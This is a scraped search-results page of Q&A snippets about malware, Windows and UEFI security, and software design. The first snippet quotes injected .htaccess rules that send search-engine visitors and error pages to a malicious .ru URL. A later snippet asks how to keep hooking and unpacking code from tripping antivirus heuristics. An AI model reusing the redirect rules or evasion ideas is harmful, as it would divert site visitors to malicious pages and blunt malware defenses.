Search Results

Search found 1523 results on 61 pages for 'anti malware'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 11/61 | < Previous Page | 7 8 9 10 11 12 13 14 15 16 17 18  | Next Page >

  • shared hosting with malware, .htaccess file gets modified every 2 hours or so

    - by apache
    I spent all day today chasing malware on the shared hosting for one of my clients. The issue is as follows: Every 2 hours or so .htaccess file and all other .htaccess files gets modified, on the top of the file these lines are added: IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L] </IfModule> and on the bottom: ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8 The main problem I'm not root on the server, and cannot sudo, as this is shared hosting with 100's of websites. Typical good commands like dmesg, lsof, dtrace, chattr and many others are not available to me as I'm not root. I can't find who is modifying .htaccess files, how do I get that info? My guess is some php script is changing that which is called from outside via command and control. This seems to relate to this: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ How do I find out who is modifying .htaccess files without being root?

    Read the article

  • Windows disk change monitoring for malware analysis

    - by SuperDuck
    Not sure if this question belongs to here, because it has some relations with 'serverfault' (system backups) and 'stackoverflow' (software analysis). I'm looking for a solution to monitor disk changes on a Windows system and selectively revert them. It should be able to handle live files like registry parts, so may need to be an offline backup software. It shouldn't silently pass over files which the current admin user doesn't have permissions on (files with no permission entries or owned by the 'system' user) Registry change tracking would be a bonus but is not a requirement I use virtual machines for malware analysis, there is even no solution to list file changes in disk snapshot files (delta VMDK). I currently use Ashampoo for monitoring changes. Though it's the best one between similars, it's not a good software and hasn't really evolved in many 'platinum', 'deluxe' versions released in the last 10 years (it even used non-resizable windows until the latest version). The real problem is it misses some disk / registry changes. Perhaps it only compares modification dates and doesn't catch a change if the dates are preserved. So, I think the solution should compare files using hashes, or file sizes at least. There are numerous backup software out there and I'm sure one can handle this, offline or online.

    Read the article

  • Identifying program attempting to install certificate on windows

    - by R..
    I'm trying to help a friend using Windows (which I'm not an expert on by any means) who's experiencing malware-like behavior: a dialog box is repeatedly popping up reading: You are about to install a certificate from a certification authority (CA) claiming to represent: CE_UmbrellaCert Warning: If you install this root certificate, Windows will automatically trust any certificate issued by this CA. Installing a certificate with an unconfirmed thumbprint is a security risk. If you click "yes" you acknowledge this risk. AV and anti-malware scanners don't detect anything. My friend hasn't accepted installing the certificate, but whatever program is trying to install it keeps retrying, making the system unusable (constant interruptions). Is there any way to track down which program is making the attempt to install it so this program can be uninstalled/deleted?

    Read the article

  • How to clean a computer with multiple accounts infected with spyware, viruses? [closed]

    - by DjKilla
    Possible Duplicate: What to do if my computer is infected by a virus or a malware? What's the best way to clean a computer with multiple accounts infected with spyware, viruses and malware? Should you install and run software to remove the infections on each account? If you install the software on one account, will it clean the entire computer including each account? For example, some programs like CCleaner will install only on one account and not offer the option for all users (accounts). Does this mean the program will clean the entire computer including other accounts or do I have to install CCleaner on each account to clean up each user's account?

    Read the article

  • Is UEFI more or less vulnerable than Legacy BIOS?

    - by Eric
    Is UEFI more secure than BIOS on a Windows 8.1 machine? Is UEFI vulnerable to malware in ways that Legacy BIOS is not? Is it correct that UEFI can connect to the internet before the OS (or anti-virus program) has loaded? On some boards, UEFI settings can be changed in Windows. Do these things affect PC security? I have read that BIOS on an MBR disc can be vulnerable to 'rootkits' There have been reports that suggest UEFI secure boot may not be infallible. Is UEFI better at defending against malware than BIOS?

    Read the article

  • Prevent my program from being flagged as malware

    - by user120242
    I know that this kind of behavior should be avoided in a publicly deployed program, but it's necessary. I do some hooking of process creation and file/registry I/O, and unpacking. I still trip a heuristic here and there, and I'm worried about future detections. Could I just contact as many AV vendors as I can, submit my program, and provide a link to my program being served publicly? Would it be possible to convince AV vendors to "whitelist" it? Does anyone perhaps have a list of places to submit false positives? Another problem I have is with people who don't update their malware scanners. There seems to be many people who just have old malware defintions and never bother to update. Is there anything that can be done about this? Or, if not, a way to check older definitions so I can locate what is being tripped, so I can try to avoid using that code?

    Read the article

  • Alternative to "inheritance v composition??"

    - by Frank
    I have colleagues at work who claim that "Inheritance is an anti-pattern" and want to use composition systematically instead, except in (rare, according to them) cases where inheritance is really the best way to go. I want to suggest an alternative where we continue using inheritance, but it is strictly forbidden (enforced by code reviews) to use anything but public members of base classes in derived classes. For a case where we don't need to swap components of a class at runtime (static inheritance), would that be equivalent enough to composition? Or am I forgetting some other important aspect of composition?

    Read the article

  • Is there an antipattern to describe this method of coding?

    - by P.Brian.Mackey
    I have a codebase where the programmer tended to wrap things up in areas that don't make sense. For example, given an Error log we have you can log via ErrorLog.Log(ex, "friendly message"); He added various other means to accomplish the exact same task. E.G. SomeClass.Log(ex, "friendly message"); Which simply turns around and calls the first method. This adds levels of complexity with no added benefit. Is there an anti-pattern to describe this?

    Read the article

  • Alternative to "inheritance versus composition?" [closed]

    - by Frank
    Possible Duplicate: Where does this concept of “favor composition over inheritance” come from? I have colleagues at work who claim that "Inheritance is an anti-pattern" and want to use composition systematically instead, except in (rare, according to them) cases where inheritance is really the best way to go. I want to suggest an alternative where we continue using inheritance, but it is strictly forbidden (enforced by code reviews) to use anything but public members of base classes in derived classes. For a case where we don't need to swap components of a class at runtime (static inheritance), would that be equivalent enough to composition? Or am I forgetting some other important aspect of composition?

    Read the article

  • EAV - is it really bad in all scenarios?

    - by Giedrius
    I'm thinking to use EAV for some of the stuff in one of the projects, but all questions about it in stackoverflow end up to answers calling EAV an anti pattern. But I'm wondering, if is it that wrong in all cases? Let's say shop product entity, it has common features, like name, description, image, price, etc., that take part in logic many places and has (semi)unique features, like watch and beach ball would be described by completely different aspects. So I think EAV would fit for storing those (semi)unique features? All this is assuming, that for showing product list, it is enough info in product table (that means no EAV is involved) and just when showing one product/comparing up to 5 products/etc. data saved using EAV is used. I've seen such approach in Magento commerce and it is quite popular, so may be there are cases, when EAV is reasonable?

    Read the article

  • Should I upgrade to Symantec Endpoint Protection? [closed]

    - by Alex C.
    I'm the IT manager at an animal shelter in Upstate New York. We have a Windows network with about 50 desktops running Windows XP Pro. We used to use CA eTrust Antivirus, but that product didn't work too well (too many infections got through). About six months ago, we switched to using Symantec Antivirus Corporate Edition ver. 10.1.8.8000. If anything, the Symantec product is even worse. The last six weeks in particular have been very bad -- we've had about seven or eight PCs get hit with those malware infections that masquerade as antivirus software. In most of those cases, Symantec didn't even flag the malware at all. So... what gives with the Symantec Antivirus? As far as I can tell, it's installed correctly and downloading updated definitions nightly. I can upgrade to Symantec Endpoint Protection for $220 (we get non-profit pricing), but I don't want to do it if it's not going to be significantly better. Any advice? Should I switch to something else entirely? Thanks!

    Read the article

  • Windows 7 UAC (user access control) is being disabled on every reboot

    - by Christian Thamer
    To put it simply, I noticed UAC was disabled so I enabled it. I was prompted to reboot the computer for the changes to take effect. Upon my reboot I checked the settings again as I hadn't disabled UAC in the first place. It was again set to off (never notify). For the heck of it I repeated the process a couple of more times. Same result each time. I have Microsoft Security Essentials running a full scan nightly so I should be protected from viruses. I also did an on demand scan with the online tool at www.antivirus.com. Nothing was found. Other than the fact that UAC is being disabled on each reboot I have no other reason to suspect a virus. So my question is does anyone have insight into if this is a possible problem with a virus or other malware changing my UAC settings on each boot or is it possibly a problem with Windows and UAC itself? If it is malware are there suggestions for other products outside of the ones I have used to detect and remove it.

    Read the article

  • Should I upgrade to Symantec Endpoint Protection?

    - by Alex C.
    I'm the IT manager at an animal shelter in Upstate New York. We have a Windows network with about 50 desktops running Windows XP Pro. We used to use CA eTrust Antivirus, but that product didn't work too well (too many infections got through). About six months ago, we switched to using Symantec Antivirus Corporate Edition ver. 10.1.8.8000. If anything, the Symantec product is even worse. The last six weeks in particular have been very bad -- we've had about seven or eight PCs get hit with those malware infections that masquerade as antivirus software. In most of those cases, Symantec didn't even flag the malware at all. So... what gives with the Symantec Antivirus? As far as I can tell, it's installed correctly and downloading updated definitions nightly. I can upgrade to Symantec Endpoint Protection for $220 (we get non-profit pricing), but I don't want to do it if it's not going to be significantly better. Any advice? Should I switch to something else entirely? Thanks!

    Read the article

  • PDF Disable Anti-alias on Lines

    - by Travis
    I'm creating a dynamically generated PDF using FPDF. My PDF requires many exactly horizontal/vertical lines in a grid and when rendered they are anti-aliased and look very fuzzy and unacceptable to the client. I need to remove the anti-aliasing for these(or all) lines in the doc. I know this is possible because it's shown correctly in the adobe pdf specs itself http://www.adobe.com/devnet/acrobat/pdfs/PDF32000_2008.pdf (warning: big file) see the box in page 2 for how this should look. How would I duplicate the box shown on this page?

    Read the article

  • Problem with Validate Anti Forgery

    - by Mikael Egnér
    Hi! I have a problem regarding MVC Anti forgery token. When I do my authentication I have pseudo code like this: var user = userRepository.GetByEmail(email); System.Threading.Thread.CurrentPrincipal = HttpContext.Current.User = user; by doing so I'm able to get the current user in my code like this: var user = HttpContext.Current.User as EntityUser; This works fine until I add the [ValidateAntiForgeryToken] attribute to an action. When I add the attribute I get A required anti-forgery token was not supplied or was invalid. If I comment out this line: System.Threading.Thread.CurrentPrincipal = HttpContext.Current.User = user; The antiforgery validation works fine, but the I don't have my convenient way of getting my "EntityUser" from the HttpContext. Any ideas of how to work around this? Best regards Mikael

    Read the article

  • After installing Windows what should I do first? update or install antivirus?

    - by EApubs
    Normally, after reformating and installing Windows 7, I used to go online and install all the updates, install all the driver updates and then install the anti virus. Because long ago, when I installed the anti virus first, applying windows updates crashed the AV! So, I install it last. Specially 7 sp1 is critical right? But now im having doubts... Going online without an antivirus means I'm vulnerable! (I have a home router which have a small firewall but I'm not sure about it) So, whats the best thing to do? Install the anti virus first or install the updates first?

    Read the article

  • So Singletons are bad, then what?

    - by Bobby Tables
    There has been a lot of discussion lately about the problems with using (and overusing) Singletons. I've been one of those people earlier in my career too. I can see what the problem is now, and yet, there are still many cases where I can't see a nice alternative - and not many of the anti-Singleton discussions really provide one. Here is a real example from a major recent project I was involved in: The application was a thick client with many separate screens and components which uses huge amounts of data from a server state which isn't updated too often. This data was basically cached in a Singleton "manager" object - the dreaded "global state". The idea was to have this one place in the app which keeps the data stored and synced, and then any new screens that are opened can just query most of what they need from there, without making repetitive requests for various supporting data from the server. Constantly requesting to the server would take too much bandwidth - and I'm talking thousands of dollars extra Internet bills per week, so that was unacceptable. Is there any other approach that could be appropriate here than basically having this kind of global data manager cache object? This object doesn't officially have to be a "Singleton" of course, but it does conceptually make sense to be one. What is a nice clean alternative here?

    Read the article

  • What design patters are the worst or most narrowly defined?

    - by Akku
    For every programming project, Managers with past programming experience try to shine when they recommend some design patterns for your project. I like design patterns when they make sense or if you need a scalbale solution. I've used Proxies, Observers and Command patterns in a positive way for example, and do so every day. But I'm really hesitant to use say a Factory pattern if there's only one way to create an object, as a factory might make it all easier in the future, but complicates the code and is pure overhead. So, my question is in respect to my future career and my answer to manager types throwing random pattern-names around: Which design patterns did you use, that threw you back overall? Which are the worst design patterns, that you shouldn't have a look at if it's not that only single situation where it makes sense (read: which design patterns are very narrowly defined)? (It's like I was looking for the negative reviews of an overall good product of amazon to see what bugged people most in using design patterns). And I'm not talking about Anti-Patterns here, but about Patterns that are usually thought of as "good" patterns.

    Read the article

  • Dynamic Forms: Pattern or AntiPattern?

    - by Segfault
    I'm sure you've seen it. The database has a bunch of tables called Forms, Controls,FormsControls, ControlSets, Actions and the program that queries these tables has a dynamically generated user interface. It will read all the forms, load a home page that has links to them all, or embed them in some tabbed or paged home page, and for each of those forms it will read the various text boxes, check boxes, radio buttons, submit buttons, combo boxes, labels and whatnot from the controls and form-to-control join tables, lay those elements out according to the database and link all the controls to logic according to other rules in the database. To me, this is an anti-pattern. It actually make the application more difficult to maintain because the design of it is now spread out into multiple different systems. Also, the database is not source controlled. Sure, it may make one or two changes go more quickly, after you've analyzed the program anyway to understand how to change the data and as long as you don't stray from the sort of changes that were anticipated and accounted for, but that's often just not sustainable. What say you?

    Read the article

  • What design patterns are the worst or most narrowly defined?

    - by Akku
    For every programming project, Managers with past programming experience try to shine when they recommend some design patterns for your project. I like design patterns when they make sense or if you need a scalbale solution. I've used Proxies, Observers and Command patterns in a positive way for example, and do so every day. But I'm really hesitant to use say a Factory pattern if there's only one way to create an object, as a factory might make it all easier in the future, but complicates the code and is pure overhead. So, my question is in respect to my future career and my answer to manager types throwing random pattern-names around: Which design patterns did you use, that threw you back overall? Which are the worst design patterns, that you shouldn't have a look at if it's not that only single situation where it makes sense (read: which design patterns are very narrowly defined)? (It's like I was looking for the negative reviews of an overall good product of amazon to see what bugged people most in using design patterns). And I'm not talking about Anti-Patterns here, but about Patterns that are usually thought of as "good" patterns. Edit: As some answered, the problem is most often that patterns are not "bad" but "used wrong". If you know patterns, that are often misused or even difficult to use, they would also fit as an answer.

    Read the article

  • Code maintenance: keeping a bad pattern when extending new code for being consistent or not ?

    - by Guillaume
    I have to extend an existing module of a project. I don't like the way it has been done (lots of anti-pattern involved, like copy/pasted code). I don't want to perform a complete refactor. Should I: create new methods using existing convention, even if I feel it wrong, to avoid confusion for the next maintainer and being consistent with the code base? or try to use what I feel better even if it is introducing another pattern in the code ? Precison edited after first answers: The existing code is not a mess. It is easy to follow and understand. BUT it is introducing lots of boilerplate code that can be avoided with good design (resulting code might become harder to follow then). In my current case it's a good old JDBC (spring template inboard) DAO module, but I have already encounter this dilemma and I'm seeking for other dev feedback. I don't want to refactor because I don't have time. And even with time it will be hard to justify that a whole perfectly working module needs refactoring. Refactoring cost will be heavier than its benefits. Remember: code is not messy or over-complex. I can not extract few methods there and introduce an abstract class here. It is more a flaw in the design (result of extreme 'Keep It Stupid Simple' I think) So the question can also be asked like that: You, as developer, do you prefer to maintain easy stupid boring code OR to have some helpers that will do the stupid boring code at your place ? Downside of the last possibility being that you'll have to learn some stuff and maybe you will have to maintain the easy stupid boring code too until a full refactoring is done)

    Read the article

  • If an entity is composed, is it still a god object?

    - by Telastyn
    I am working on a system to configure hardware. Unfortunately, there is tons of variety in the hardware, which means there's a wide variety of capabilities and configurations depending on what specific hardware the software connects to. To deal with this, we're using a Component Based Entity design where the "hardware" class itself is a very thin container for components that are composed at runtime based on what capabilities/configuration are available. This works great, and the design itself has worked well elsewhere (particularly in games). The problem is that all this software does is configure the hardware. As such, almost all of the code is a component of the hardware instance. While the consumer only ever works against the strongly typed interfaces for the components, it could be argued that the class that represents an instance of the hardware is a God Object. If you want to do anything to/with the hardware, you query an interface and work with it. So, even if the components of an object are modular and decoupled well, is their container a God Object and the downsides associated with the anti-pattern?

    Read the article

  • Des chercheurs en sécurité découvrent Dexter, un malware qui cible essentiellement les systèmes de point de vente

    Des chercheurs en sécurité découvrent Dexter un malware qui cible essentiellement les systèmes de point de vente Les pirates pour voler les données des cartes de crédit ont trouvé un moyen d'insérer un malware directement dans les systèmes de point de vente (POS). La firme de sécurité Seculert vient d'identifier un programme malveillant spécialement conçu pour attaquer les systèmes de point de vente. Le logiciel malveillant baptisé Dexter, aurait déjà infecté des systèmes POS dans près de 40 pays au cours des deux derniers mois. Les pays anglo-saxons semblent être les cibles favorites du malware, avec 30% d'attaque aux USA, 19% en Grande-Bretagne et 9% au Canada. L...

    Read the article

  • How to remove fastaddressbar?

    - by deadfish
    somehow I downloaded and installed spyware or malware. I do not know. I know that if I write somethin in field where you put as a website link I get web engine results but not by google but fastaddressbar.. It is part of websearch toolbar. Most of them was blocked and added to quarantine by my antivirus comodo however I still do not know how restore fast search in firefox to get results from google. Please help :(

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 7 8 9 10 11 12 13 14 15 16 17 18  | Next Page >